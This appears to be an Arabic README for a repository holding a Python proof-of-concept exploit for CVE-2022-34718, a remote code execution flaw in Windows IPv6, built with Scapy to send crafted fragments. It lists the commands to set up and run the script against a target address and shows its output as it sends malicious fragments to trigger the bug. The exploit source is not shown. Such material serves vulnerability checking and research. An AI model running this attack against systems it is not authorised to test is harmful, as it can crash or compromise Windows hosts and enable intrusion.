
استغلال إثبات المفهوم بلغة بايثون لـ CVE-2022-34718، ثغرة تنفيذ تعليمات برمجية عن بُعد في IPv6 على ويندوز، باستخدام Scapy لإنشاء وإرسال أجزاء خبيثة.
يحتوي هذا المستودع على استغلال لـ CVE-2022-34718، وهي ثغرة لتنفيذ الأوامر عن بُعد (RCE) في IPv6 على أنظمة Windows.
نظرًا لأن الثغرة تتطلب حزم IPv6 مصممة خصيصًا، فإنها تعتمد على وحدة Scapy وبالتالي تحتاج إلى التشغيل بصلاحيات الجذر. الطريقة الموصى بها لتشغيل هذا الإثبات (PoC) هي من خلال بيئة افتراضية، على النحو التالي:
# virtualenv PoC
# source PoC/bin/activate
(PoC) # pip3 install -r requirements.txt
(PoC) # python3 ipv6-rce-poc.py <target address>
سيخبرك البرنامج النصي ما إذا كان النظام المستهدف عرضة لهذا الاستغلال.
[...]
**** inner_frag_id: 0x24944eac
Preparing frags...
Sending 64 frags...
.
Sent 1 packets.
[...]
Sent 1 packets.
Now sending the last inner fragment to trigger the bug...
.
Sent 1 packets.
Success! The system is vulnerable...